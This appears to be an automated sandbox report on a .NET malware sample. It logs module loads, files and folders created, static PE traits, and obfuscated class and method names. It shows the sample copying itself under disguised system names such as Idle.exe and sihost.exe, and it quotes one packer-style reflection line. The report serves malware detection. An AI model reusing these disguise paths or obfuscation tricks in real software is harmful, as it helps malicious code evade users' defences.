Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: mscoree.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: version.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: wldp.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Section loaded: sspicli.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: apphelp.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: version.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: sspicli.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: version.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: mscoree.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: version.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: wldp.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: mscoree.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: version.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: wldp.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Directory created: C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe			Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Directory created: C:\Program Files\MSBuild\Microsoft\897f7819a04651			Jump to behavior

Source: F3ePjP272h.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: F3ePjP272h.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: F3ePjP272h.exe

Static file information: File size 1917440 > 1048576

Source: F3ePjP272h.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d3a00

Source: F3ePjP272h.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: F3ePjP272h.exe, KVnWYPJNu8w0oyv3iR1.cs

.Net Code: Type.GetTypeFromHandle(cOHihKQOkYMhTQIrqxK.BucHmSTqHIc(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(cOHihKQOkYMhTQIrqxK.BucHmSTqHIc(16777245)),Type.GetTypeFromHandle(cOHihKQOkYMhTQIrqxK.BucHmSTqHIc(16777259))})

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF848F44B61 pushad ; retf	0_2_00007FF848F44B67
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF848F4476A push edi; iretd	0_2_00007FF848F44770
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933E1F3 push esp; ret	0_2_00007FF84933E208
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933DBDE push ebp; ret	0_2_00007FF84933DBE0
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933DBF3 push esi; ret	0_2_00007FF84933DBF4
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933DE52 push ebx; ret	0_2_00007FF84933DE53
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933E093 push ebp; ret	0_2_00007FF84933E094
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933DF29 push edx; ret	0_2_00007FF84933DF2D
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 24_2_00007FF848F24B61 pushad ; retf	24_2_00007FF848F24B67
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 24_2_00007FF848F2476A push edi; iretd	24_2_00007FF848F24770
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 25_2_00007FF848F24B61 pushad ; retf	25_2_00007FF848F24B67
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 25_2_00007FF848F2476A push edi; iretd	25_2_00007FF848F24770
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF848F24B61 pushad ; retf	26_2_00007FF848F24B67
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF848F2476A push edi; iretd	26_2_00007FF848F24770
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF84931DE53 push edx; ret	26_2_00007FF84931DE58
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF84931DD88 push esp; ret	26_2_00007FF84931DD8C
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF84931DDA9 push edx; ret	26_2_00007FF84931DDAA
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF84931E01A push esi; ret	26_2_00007FF84931E027
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF84931E0D2 push FFFFFF80h; ret	26_2_00007FF84931E0D4
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF849319FBB push eax; retf	26_2_00007FF849319FBD
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF849319FBE push 99E3E864h; ret	26_2_00007FF849319FC3
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 27_2_00007FF848F34B61 pushad ; retf	27_2_00007FF848F34B67
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 27_2_00007FF848F3476A push edi; iretd	27_2_00007FF848F34770
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 28_2_00007FF848F34B61 pushad ; retf	28_2_00007FF848F34B67
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 28_2_00007FF848F3476A push edi; iretd	28_2_00007FF848F34770
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 29_2_00007FF848F34B61 pushad ; retf	29_2_00007FF848F34B67
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 29_2_00007FF848F3476A push edi; iretd	29_2_00007FF848F34770
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 30_2_00007FF848F34B61 pushad ; retf	30_2_00007FF848F34B67
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 30_2_00007FF848F3476A push edi; iretd	30_2_00007FF848F34770
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 31_2_00007FF848F14B61 pushad ; retf	31_2_00007FF848F14B67
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 31_2_00007FF848F1476A push edi; iretd	31_2_00007FF848F14770

Source: F3ePjP272h.exe	Static PE information: section name: .text entropy: 7.540707817014113
Source: sihost.exe.0.dr	Static PE information: section name: .text entropy: 7.540707817014113
Source: jmfWpjtPWHWFodUifDHiQtgxi.exe.0.dr	Static PE information: section name: .text entropy: 7.540707817014113
Source: jmfWpjtPWHWFodUifDHiQtgxi.exe0.0.dr	Static PE information: section name: .text entropy: 7.540707817014113
Source: Idle.exe.0.dr	Static PE information: section name: .text entropy: 7.540707817014113

Source: F3ePjP272h.exe, k1KEc9wPYXadS273iNG.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'In9wKQeWwq', 'DlDt9D1xFXV43XQPAV7Z', 'mOg8QC1xGOLtSeMUL5YQ', 'W8WbWr1xDojLyecbcUta', 'GKJKIZ1xovEf2OdsCHR4', 'O8CnXT1xCUBAJKHsY0jV', 'zBeDWU1x3TcROF2amgKw'
Source: F3ePjP272h.exe, kPjye1yPToe3eg5CIkx.cs	High entropy of concatenated method names: 'method_0', 'u9byKsOeY7', 'mepyUZLbxv', 'MjAyFiIJST', 'QTIyGopmO0', 'ASpyDTfACw', 'jNZyodXBTa', 'bPXsJK1dkKNiqf4pGRfD', 'cwjFHF1dY5uu8eUIgJo9', 'O6TQlv1dsPsURPdRLDKB'
Source: F3ePjP272h.exe, QHf5RMIw1AwHWaxcKj9.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'mPc1VjQaMtR', 'DSU1udqwane', 'Te2yVE13pl7jRd272I0C', 'lBZ20K13Ivp0Y021U9VB', 'rTaiTV13qLNMRUjSLXws', 'KFHwep13Zp0wW4wjYTha', 'PZO8PM13l8GLo9LNmIDm'
Source: F3ePjP272h.exe, ridSxJPRSS7ux0jbatY.cs	High entropy of concatenated method names: 'PCqP2YeNTI', 'cjtPzcCpu9', 'eWtv0Arc77', 'cj0v18byfU', 'uTVvH48W2G', 'Im7vfhA5eh', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: F3ePjP272h.exe, QGvLGBVlsvSHogUxrx3.cs	High entropy of concatenated method names: 'ROPVi2DPTU', 'ARuZjD1UTBCAFhoP09gf', 'Yr6qtl1Ucbp9nLHefB3s', 'OonZlQ1ULS4NCW5KEk4l', 'EaY9wC1UdDZMEVEh14bv', 'NKSCuJ1U3of89ICkXSih', 'p2eTq01USyKtw9J1aTyv', 'vNKeYO1UemdFRvawY38R'
Source: F3ePjP272h.exe, JlANlmMOb6Zv22AdaEV.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'o2sNZ61FCp7682ougcIT', 'eKBdvp1F3HBjYEEtXW9V', 'VGuy511FS5yZYY3Hl76q', 'l7ZMYaNiVo'
Source: F3ePjP272h.exe, U9KAmofysKXD8dpORAv.cs	High entropy of concatenated method names: 'VgOfTyijPF', 'rRlfcu0s4k', 'OoJfLQQudW', 'n6gP2s1rdt3FJ8rs9l7u', 'nEacP51re7Ov1hn3xfOh', 'LZow3J1rcQs8sgo4RtSP', 'LY6WHK1rLK6xllfCqm4t', 'Pj6fnVFmsV', 'kB3frFlv57', 'wowf5LAChJ'
Source: F3ePjP272h.exe, xjMdKymCNAFekogp9ij.cs	High entropy of concatenated method names: 'q64', 'P9X', 'OMF1uON98UW', 'vmethod_0', 'vy61VWmwbrP', 'imethod_0', 'A2xU0o1Px8rQNihlRBhg', 'SN9oLK1PJZ7NrIlSPOYP', 'JIYar71PRgW9jOGv0NQC', 'sKTYd01PQ3yFKdXyqxN1'
Source: F3ePjP272h.exe, wvTLmdmMFRPsrtMJvGl.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'Hro1Vm2uJs4', 'qVC1u1wsqPH', 'n6ear31PZjHyw7oKn6mZ', 'rQOaQI1Pledrgq7qwpb5', 'Ut5ihy1PgqFbhjMvUfSP', 'xYbHbm1PiHkYYhefGKGi'
Source: F3ePjP272h.exe, gS7rTjzQN5B7LoyQYR.cs	High entropy of concatenated method names: 'sHM11dZp57', 'Awg1fFD4bv', 'hml1u2mQPD', 'uaX1mi1BJJ', 'tYQ1W77WYJ', 'm9W1X7hpdR', 'fM41Ml74GA', 'qx4SUi19VxR8e2jENF5n', 'nq3e2n19M8NiTgf2i0oY', 'N6GKcc1948jxYR99U19n'
Source: F3ePjP272h.exe, nuCvZImYeMVVWAp6jk0.cs	High entropy of concatenated method names: 'NpIm9NDZDH', 'TXhmnpaBDR', 'kBjmrHtR9t', 'oZY1Vx1PdAxvfYrp8D3a', 'WoLLfB1Pcx7QOk6WtU9b', 'UfaFZR1PLwKYFKJqrnph', 'qI0migbBGa', 'XtsmBY4m4m', 'nusKvW1P3j8VAZMqCFhn', 'z4BHax1PSgukbsMUwVqy'
Source: F3ePjP272h.exe, NlAONGXMBI1Ug9nVk5P.cs	High entropy of concatenated method names: 'zyyXbqq92i', 'vOSX8eiTdc', 'DqKAfY1KZNM4GV4GYSBE', 'bCkZJH1KIsdiLySynXwV', 'Kbg3GW1KqU8IkD3jxRqC', 'F5dxIW1KlTjbHTigMVpU', 'iAyIcg1KguQsK14kZV56', 'H7PuEB1Ki0tGej44CeV2'
Source: F3ePjP272h.exe, WGRQjrXIrbt2bQYXTKT.cs	High entropy of concatenated method names: 'YiuXnnahI9', 'L9lTHw1KLtdYCo01YN0A', 'RrHgrq1KTFThdtPyK6YE', 'HuoUna1KcuTbr8rPN4jj', 'p2V1R01Kdp1Xx6hVglMW', 'C1n5tZ1KeNLMNrV9jpfl', 'tPkgVb1KtCeMpawqJOGI', 'O3sXZZZ2v3', 'T0VXln0WDI', 'k12Xg7T0A3'
